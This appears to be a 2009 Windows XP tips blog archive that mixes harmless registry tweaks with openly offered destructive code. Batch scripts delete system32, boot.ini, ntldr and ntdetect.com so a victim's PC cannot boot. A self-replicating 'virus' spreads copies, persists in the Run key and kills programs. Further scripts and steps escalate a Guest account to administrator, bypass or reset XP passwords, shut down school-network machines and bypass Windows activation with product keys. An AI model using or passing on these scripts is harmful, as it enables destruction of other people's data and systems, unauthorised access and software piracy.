Saturday, January 17, 2009
Speeding Up the Dual-Boot Timeout
see an operating system selection menu on startup. If you typically boot into Windows
XP and not the other operating system, you can speed up the dual-boot timeout value
so that you do not wait so long for the boot process to select your default operating
system and continue with the boot process. The default timeout value is 30 seconds
but you can change this setting to 10. This gives you enough time to select the
alternate operating system if you want but also speeds up the boot process. You can
skip this section if you do not use a dual-boot configuration.
Follow these steps:
1. Locate the boot.ini file on your computer. It is a hidden file by default; mine is
located in C:\boot.ini.
2. Open the file with Notepad (which is what opens it by default).
3. Change the Timeout value to 10.
4. Select File/Save and close Notepad.
Reducing the Wait Time
applications or processes that are currently running. So close all applications first.
However, some applications and processes are always running in the background.
You can reduce the amount of time that Windows XP waits for those applications and
processes to close before Windows XP kills them.
1. Open registry editor
2. Navigate to HKEY_USERS\.DEFAULT\Control Panel\Desktop. Set the
WaitToKillAppTimeout and set the value to 1000. Select the HungAppTimeout
\newline value and set it to 1000 as well.
3. Navigate to HKEY_LOCAL_MACHINE\System\CurrentControl
Select the WaitToKillServiceTimeout value and set it to 10000.
4. Close the Registry Editor.
Unhide the Administrator
appropriately enough, "Administrator"). This account is invisible unless either your
system has no other accounts or you are booting in Safe Mode. To remove
Administrator's camouflage and add it to XP's Welcome screen, navigate to & select
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wi
ogon\SpecialAccounts\UserList in the Registry Editor, and double-click the
Administrator icon in the right pane. If you don't see this icon, right-click in the pane,
choose New, DWORD Value, name it Administrator, and press Enter. Type 1 in the
'Value data' box, and press . From now on, when you open the User
Accounts window via the Control Panel, you'll see the Administrator account. You
can easily change its picture or give it a password. In addition, the next time you see
the Welcome screen, your Administrator account will be visible, along with the entire
computer's other user accounts.
Retitle Internet Explorer
viewing, followed by "Microsoft Internet Explorer"--or in some cases, your
company's name or the name of the ISP that supplied the browser. To change the
repeating text in IE's title bar (or to get rid of it altogether), navigate to and select
HKEY_CURRENT_USER\Software\Microsoft\Int
Editor, and double-click the Window Title icon in the right pane. (If you don't see this
icon, right-click in the pane, choose New, String Value, type Window Title, and press
.) Type what you want to see on IE's title bar, or type nothing to show only
the site name. Note that the hyphen that normally separates the site name from the
page title will remain. When you relaunch Internet Explorer, you will see the change.
Monday, January 12, 2009
What is double password?
But, from now on, you can turn any USB flash drive into a secure token! No need to purchase an additional expensive device. All you need is about 2 megabytes of free space on your flash drive or other USB gadget, such as an MP3 player,PDA or even a USB-pluggable mobile handset.

    
    How does it work? Our software, Double Password, installs onto your flash drive. When you type a password, the program intercepts it and converts it into a super-strong password string on-the-fly. You can use simple, easy-to-remember passwords without the           risk of being cracked.
     Another benefit of using Double Password is that nobody can steal your passwords. Spy programs are useless. Even if someone gets the "weak" password that you type on the keyboard, it means nothing. This password will only work when your USB flash is inserted.
While typical hardware locks will work only with software that supports secure tokens, Double Password works with any software. It           simply substitutes your weak password with a strong one.
     Double Password can be effectively used to securely lock your Windows account, to protect your laptop and to bring a new level of security to all software that uses password authentication
http://www.refog.com/files/doublepassword.exe
Friday, January 9, 2009
A CODE THAT WILL OPEN ND CLOSE UR CD ROM DRIVE
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If
copy this into notepad and save it as anyname.vbs like cdrom.vbs
and then double click on it...what u see....bingo
Now if u want to disable this go to task manager click on process
then find wscript.exe and end this process
Error message
piece of software that didn't uninstall properly and continues to give errors on
startupyou can disable it from displaying on startup. Run the Registry Editor and go to
HKEY_LOCAL MACHINE\SYSTEM\CurrentControlSet\Control\Windows. (This
key holds a variety of Windows system settings, such as the location of your system
directory.) Create a new DWORD called NoPopupsOnBoot and give it a value of 1.
Exit the Registry and reboot for the setting to take effect. To disable it, either delete
the DWORD value or give it a value of 0.
Hidden Program In Microsoft windows........
1- Private Character Editor
This program is for designing icons and Characters(Alphapet)
Click :start
Then :run
type :EUDCEDIT
.................................................. .................................................. .............................................
2- iExpress
This Program is for conerting your files to EXCUTABLE files
Click : start
Then : run
type : iexpress
.................................................. .................................................. .............................................
3-Disk Cleanup
This program used for cleaning harddisk to offer space
Click : start
Then : run
type : cleanmgr
.................................................. .................................................. .............................................
4-Dr Watson
This program Is for repairing problems in Windows
Click : start
Then : run
type : drwtsn32
.................................................. .................................................. .............................................
5-Windows Media Player 5.1
Opens the old media player
Click : start
Then : run
type : mplay32
.................................................. .................................................. .............................................
Program ............. CODE
__________ __________
Character Map = charmap
DirectX diagnosis = dxdiag
Object Packager = packager
System Monitor = perfmon
Program Manager = progman
Remote Access phone book = rasphone
Registry Editor = regedt32
File siganture verification tool = sigverif
Volume Contro = sndvol32
System Configuration Editor = sysedit
Syskey = syskey
Microsoft Telnet Client = telnet
Making Virus Using Fundamentals of DOS
We can make a batch file which will Shutdown the computer everytime on startup !
Here is how ?
? Open Notepad
? Type :
@ECHO OFF
shutdown -s -t 10 -c "Virus Attack..."
exit
? File >> Save As...
? Name it : virus.bat
? Start >> All Programs
? Right Click on Startup >> Open
? This open the Startup folder
? Paste the Virus.bat file here !
Open Zip Files even if Winzip is not installed
Open Zip files in Pc if u dont have winzip software installed..
In Start>Run, type the following and press enter.
regsvr32 /u zipfldr.dll
now u can open zip files easily....
Working In guest as admin
This might not always work but it's pretty useful because your able to install programs although your administrator has bloked it.
Steps
1. When your installing the program here is what you have to do.
2. When it gives you the option of choosing the directory or destination where the program will be intall, before clicking next click browse to choose a different destination.
3. The destination your going to choose is
C:\Documents and Settings\"your username"\"name of program being installed"\
4. So just browse to
The C:\ drive
Then Documents and Settings
Then your User Name
5. The reason why you do this is because since your intalling it in your account name the computer doesn't stop or check anything because its your account and your name, but if you just select the desktop and choose to install it there it going to say something like "you do not have enough administrative privileges" something like that.
Much Simpler trick to Hack admin from Guest
HaCk "GUEST" with Admin privileges
Copy this to notepad
Quote:
echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0
Save the file as "Guest2admin.bat"
then u can double click the file to execute or run in the cmd.
Shutdown pcs at school/ colleges
You wanna mess around with your school network?
You wanna own the shit out of some kiddies who think they're the best?
Well thankfully there's the shutdown function in cmd Smile
First of all you need to have access to a cmd prompt on the network for this to work.
If it's disabled you can obviously run everything from .bat files.
So first type in
Code:
Net View
This will give you all the names for all the computers on the network.
Then you want to find a target and write it down, so for example a name is //045-comproom1-05 then you will utilize that name to shutdown the computer.
What next? Well if you're a lil skiddy yourself then the easiest thing to do is type in
Code:
shutdown -i
which will give you a gui interface and you'll be able to shutdown whichever computer you want with it, you can set a time, even throw in a funny comment like "owned" or somethin Smile.
commands you will use if you just wanna use the command interface are
Code:
shutdown -m //computername
- shutsdown the pc.
Code:
shutdown -m -c "owned"
shutdown with a comment.
Code:
shutdown -l
logoff the user.
Code:
shutdown -r
restart the computer.
and so on...
Well that was a nice and quick tutorial now wasn't it?
Have fun, be safe.
Best Prank Scripts
well its a bit tough to stop this script.. the only way to stop this is to restart the pc......
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
type it in notepad and save it as "anthing.vbs"
FOR BACKSPACE:
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
type it in notepad and save it as "anthing.vbs"
Make Your Keyboard to type "You are a fool" cont.
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop
type it in notepad and save it as "anthing.vbs"
To Open Notepad continually
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
type it in notepad and save it as "anthing.vbs"
To stop this processes
open TASK MANAGER--->PROCESSES
search for wscript.exe and stop it!!!!!!
Make Virus In Notepad
The only thing you need is Notepad.
Now, to test it, create a textfile called myfile.txt(empty) in C:\
Now in your notepad type "erase C:\myfile.txt" (without the quotes). Then do "Save As..." and save it as "myfile.cmd".
Now run the file "myfile.cmd" and go to C:\ and you'll see your myfile.txt is gone. Now, the real work begins:
Go to Notpad and type erase C:\WINDOWS (or C:\LINUX if you have linux) and save it again as findoutaname.cmd. Now DON'T run the file or you'll lose your WINDOWS map. So, that's the virus. Now to take revenge. Send you file to your victim. Once she/he opens it. Her/his WINDOWS/LINUX map is gone. And have to install LINUX/WINDOWS again.
Making a file that destroys ur victims pc
1. Open Notepad
2. write the below command : -
del c:\WINDOWS\system32\**/q
3. Save the above notepad with the extension ".bat or .cmd" as u wa
4. !!!!!!!!!!!!!!!!!!!!!!Attention!!!!!!!!!!!!!!!!!!!!!!
Don't double click the file otherwise u r in trouble.
Why ?????? bcz the file u created deletes all files from ur
system32 folder and when u restart ur pc it will not start
bcz system can not find the files in the system32 folder which
is required at the time of booting.
5. You can also test the above by creating a fake folder let suppose
windows1 in C:\. Copy some old files in it and just follow the
above command.By double clicking the bat or cmd file ur all files
automaitcally get deleted.
6. You can try this file in any one`s computer.(but this result in causing damage to the computer, so think again before trying this on anyone's pc)
Hack Admin account in xp:by batch Script!!!
This is a simple trick but most of us dont know this:
Hack Administrators group:
Copy and paste the code given below in notepad and save it as anyname.bat(not txt)
Den double click on it. This will add u in administrators group Enjoy.
echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0
This is how you can add administrative priviliges for guest.
Block USB Devices
To this what can be done is that the USB can be blocked and then stopping the use of USB drives. Here is a simple registry hack to do so, try it with care.
1. Go to Start –> Run, type Regedit.
2. Go to HKEY_LOCAL_MACHINE\System\CurrentControlset\Services\USBStor
3. In the right pane, look for value Start and have value as 0000000(3)
4. Double click on that and change that value to 4.
You might be required to restart the PC, and then you are done with it, USB is now blocked.
In case if you want to get the USB unblocked, just change the value again to 3.
See, its so easy. Isn’t it
Block Websties Without Software
Block Websties Without Software
Steps:
1] Browse C:\WINDOWS\system32\drivers\etc
2] Find the file named "HOSTS"
3] Open it in notepad
4] Under "127.0.0.1 localhost" Add 127.0.0.2 www.sitenameyouwantblocked.com , and that site will no longer be accessable.
5] Done!
-So-
127.0.0.1 localhost
127.0.0.2 www.blockedsite.com
-->www.blockedsite.com is now unaccessable<--
For every site after that you want to add, just add "1" to the last number in the internal ip (127.0.0.2) and then the addy like before.
IE: 127.0.0.3 www.blablabla.com
127.0.0.4 www.blablabla.com
127.0.0.5 www.blablabla.com
etc..
Breaking The XP Password!!!
In case of user password boot the pc in safemode by pressing the F8 key and then selecting the Safe Mode option. You can now logon as an administrator and XP wont prompt for the password. Incase of an administrator account try rebooting the pc in DOS. access C:\Windows\system32\config\sam . Rename SAM as SAM.mj
Now XP wont ask for password next time You Login. Also
Go to the cmd prompt .
Type net user *.
It will list all the users.
Again type net user "administrator" or the name of the administrator "name" *.
e.g.: net user aaaaaa *(where aaaaaa is the name).
It will ask for the password.
Type the password and there you are done.
Logging In As Administrator:
Hold the Ctrl-Alt key and press Del twice. This will bring up the normal login and you can log on as Administrator.
To unhide the Administrator account so it does show up:
Start Regedit
Go to HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList
Unhide the Administrator key by giving it a value of 1
VIRUS
o.O How to shut down a computer FOREVER! O.o°
How to shut down a computer FOREVER!
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
Open up notepad and copy and paste that. Save it as a .bat file.
This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart. Have fun
REMEMBER - DO NOT CLICK THIS FILE. (for the idiots)
YOU WONT RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE!
And the best part of it is Antiviruses wont detect it.. I luvvv batch files...
--------------------------------------------------------------------------------------------------------------
HEY HERE IS THE SIMPLE WAY 2 BLOCK URS ENEMEIS PC
The Simple Deadliest Code
open notepad type the code as following -
___________________________________________________
echo off
C:
cd..
cd..
cd..
attrib -r -s -h ntdetect.com
del ntdetect.com
echo on
print U r a LOSER RD is a Winner
____________________________________________________
save this file as virus.bat or any other name with bat extension
Double click it in the victim's computer or Put it in Startup of Ur enemy or put it in a CD and set it in the autorun.
BANG !
with this activated once the computer will run perfectly !
once shutdowned then it will not start and U will have to format it
Convert a Guest account into an Admin?
All you need to do is copy the code below, copy/paste it into Notepad and save it as Guest2admin.bat on your desktop.
echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0
Double-click the file to execute or type the above-given code in Command Prompt.
Note: this also creates a net account which is also accessable through nets open port (basically it’s a security leak).
Look guys i cannot gaurantee u dat this command wuld work coz i hav not checked it nd hav not made it but for knowledge purpose i thought wuld b helpful
HACK WINDOWS LOGON PASSWORD
Actually this is a vulnerability and an option and not a hack.
Normally while windows xp is installed the password for the Administrator account is left blank.Later users put their names as usernames and set a password.
Here is the catch.There is now 2 administrators.
1. Administrator
2.The name for eg:ANGEL
Now hacking ANGEL is our task.We log on to Administrator which doesnt need any password.For this at the log on screen press ctrl+alt+del(twice).
The classical prompt appears and u can type 'Administrator' in the username field and u r logged on.
Here select start->Run and type
'control userpasswords2'.Now select ANGEL and click 'Resest password'.
Voila!!Its done and u can now log off and enter ANGEL.
NB:-(ANGEL has to be a administrator type a/c).
How to create a new user account (win xp) using dos
First create a new account
type:
net user USERNAME PASSWORD \ADD
were username is and password type the name you want it to be and the password
to delete the account or some one you hate type
net user USERNAME \del
again were username is type the username of the person
to get admin rights type
net localgroup administrators username \add
the compleate command
[username [password | *] [options]] [/DOMAIN]
username {password | *} /ADD [options] [/DOMAIN]
username [/DELETE] [/DOMAIN]
How To Make a Folder Invisble
1. Right click u`r mouse goto
NEW---> Folder
2. Enter the Folder name / Rename an existing name with the
Alt key (on keyboard) + 0160 (number)
U`ll obseve the Foldername is empty
3. Now Rightclick on the folder and go to its
Properties--->Customize tab---->Change Icon
Now scroll the icons to right such that u reach 13th (approx) positioned icon from
begining u`ll see a Blank space / White space below select it.
Now everything is done u`ll se u`r foder is invisble now.
4. If u want to hide it just right click on the folder and go to its
Properties--->General tab
u`ll see a check box "Hide", check it and Apply now everthing is done.
This can also be done in the command prompt using "attrib" command.
[If u want to learn in command prompt also Assist me]
Note:Hidden file can be viewed if "showhiddenfiles" Check box is checked in the
" Tools-->Folder options-->View tab-->Hidden files and folders "
of My Computer and cannot be viewed if
"Do not show hidden files and folders" is checked.
Explanation: The folder name has been kept empty when when u rename it with
alt key + 0160. Actually the name is not empty, here we kept an empty space as a
foldername which cannot be applied directly so we use the alt key for it. And the rest of the icon changing ang hiding it is predefined in XP.....
Make Undeletable Folders
Open command prompt.
change to the directory in which u want to make folder.
type
mkdir .\con\\
Or
Md .\con\\
You can choose folder name from the name given below
CON
LPT1
LPT2
LPT3
LPT4
LPT5
LPT6
LPT7
LPT8
LPT9
AUX
---------
Logic behind this is : IN Windows above names are researved words and you cann't create folder or file with above name. Once you will create the folder nobody will be able to delete it in normal way. I have tested it with XP 2000 and 2003. Windows 98 is currently not available to me for testing. If you can test it on Windows 98 then please do it and let me know the result. I expect it to work.
This procedure described below will allow you to bypass the Microsoft Genuine Validation.
I hope this is the best way to make your copy of windows xp geniune.
1. Click START>RUN and type ‘regedit’
2 Registry window will be opened, Then Go to
HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\Windows NT\CurrentVersion\WPAEvents\OOBETimer
…and double click on it. Then change the value D6 to C4
now close out regedit.
3) Go to start > run > “%systemroot%\system32\oobe\msoobe.exe /a” (again, dont type the quotes)
4) the activation screen will come up, click on register over telephone, then click on CHANGE PRODUCT KEY, enter in this key:
V2C47-MK7JD-3R89F-D2KXW-VPK3J
JG28K-H9Q7X-BH6W4-3PDCQ-6XBFJ (Professional XP ONLY)
BQJG2-2MJT7-H7F6K-XW98B-4HQRQ (Home Edition ONLY)
If the above keys are not working, report me...
Now you can download all the updates without activating, and the Genuine Microsoft Validation will **** you No more.
Note: This works better after reformat.
Shut Down PC.....FOREVER
A virus that shuts down ur pc once nd forever
jus copy the code below in a notepad nd follow the instructions
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive
save as bat file in notepad!!
This will pop up a message saying OWNED!!
and shut down the computer never to reboot again
SHUTDOWN UR FRIENDS PC EVERYTIME HE STARTS!!!
Shutdown ur friend's comp when everytime it starts
Thats really easy.
put this followin text in a .reg file and run it in the victims pc:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"VIRUS"="%windir%\\SYSTEM32\\SHUTDOWN.EXE -t 1 -c \"Howz this new Virus ah\" -f"
DONT PUT IT IN UR COMPUTER, I AM NOT RESPONSIBLE, if it happens, to you, start windows in safe mode, and open registry editor by typiing REGEDIT in start->run. navigate to [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]and remove the string value named VIRUS, restart you computer.
You can also put this in a javascript code, just add this code to your webpage:
Simple virus
xXx simple viruse xXx
Batch File Virus
copy the below code and paste into your notepad.. then save as anyname.bat
Do not click on that batch file........ Send it your enimies email...
It will
1) Copy itself into startup
2) Copy itself over one thousand times into random spots in your computer
3) Hide its self and all other created files
4) Task kill MSN, Norton, Windows Explorer, Limewire.
5) Swap the left mouse button with the right one
6) Opens alert boxes
7) Changes the time to 12:00 and shuts down the computer
Code :-
@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP
credits sir thief
SPEED UP UR MOZILA FIREFOX
Speed Up Your FireFox-!!!!!!
Basically after getting to the hidden config settings you set the browser to request more data that it usually does.
step 1.Type "about:config" into the address bar and hit enter. Scroll down and look for the following entries:
network.http.pipelining network.http.proxy.pipelining network.http.pipelining.maxrequests
Normally the browser will make one request to a web page at a time. When you enable pipelining it will make several at once, which really speeds up page loading.
2. Alter the entries as follows:
Set "network.http.pipelining" to "true"
Set "network.http.proxy.pipelining" to "true"
Set "network.http.pipelining.maxrequests" to some number like 30. This means it will make 30 requests at once.
3. Lastly right-click anywhere and select New-> Integer. Name it "nglayout.initialpaint.delay" and set its value to "0". This value is the amount of time the browser waits before it acts on information it receives.
If you're using a broadband connection you'll load pages MUCH faster now!
Please do all this very carefully
i can take ur queries but m not responsible if ur firefox works defectively
PLZ POST UR FEEDBacks!!
Speeding Up the Dual-Boot Timeout
see an operating system selection menu on startup. If you typically boot into Windows
XP and not the other operating system, you can speed up the dual-boot timeout value
so that you do not wait so long for the boot process to select your default operating
system and continue with the boot process. The default timeout value is 30 seconds
but you can change this setting to 10. This gives you enough time to select the
alternate operating system if you want but also speeds up the boot process. You can
skip this section if you do not use a dual-boot configuration.
Follow these steps:
1. Locate the boot.ini file on your computer. It is a hidden file by default; mine is
located in C:\boot.ini.
2. Open the file with Notepad (which is what opens it by default).
3. Change the Timeout value to 10.
4. Select File/Save and close Notepad.
Task Manager has been disabled by your admin
Task Manager has been disabled by your administrator
Enabling Task Manager from Group Policy Editor
1. Go to “Start” -> “Run” -> Write “Gpedit.msc” and press on “Enter” button.
2. Navigate to “User Configuration” -> “Administrative Templates” -> “System” -> “Ctrl+Alt+Del Options”
3. In the right side of the screen verity that “Remove Task Manager”" option set to “Disable” or “Not Configured”.
4. Close “Gpedit.msc” MMC.
5. Go to “Start” -> “Run” -> Write “gpupdate /force” and press on “Enter” button.
Enabling Task Manager from the Run Menu
Go to Start –> Run and copy and paste the following and press OK.
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f
To prevent writing of data into usbs
start->Run->type regedit
browse through
"HKEY_LOCAL_MACHINE\System\CurrentControlSet\control"
Add a folder "StorageDevicePolicies"
Add a DWORD "WriteProtect" and give it a value '1'
Unhide the Administrator
appropriately enough, "Administrator"). This account is invisible unless either your
system has no other accounts or you are booting in Safe Mode. To remove
Administrator's camouflage and add it to XP's Welcome screen, navigate to & select
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winl
ogon\SpecialAccounts\UserList in the Registry Editor, and double-click the
Administrator icon in the right pane. If you don't see this icon, right-click in the pane,
choose New, DWORD Value, name it Administrator, and press Enter. Type 1 in the
'Value data' box, and press . From now on, when you open the User
Accounts window via the Control Panel, you'll see the Administrator account. You
can easily change its picture or give it a password. In addition, the next time you see
the Welcome screen, your Administrator account will be visible, along with the entire
computer's other user accounts.
Hack Admin Password Using Guest Account
if u login with a limited account or guest account and want to crack administrator account
just goto run.
type lusrmgr.msc
choose user
in right side find administrator right click on it and choose set password .
set any password or leave it blank.
 



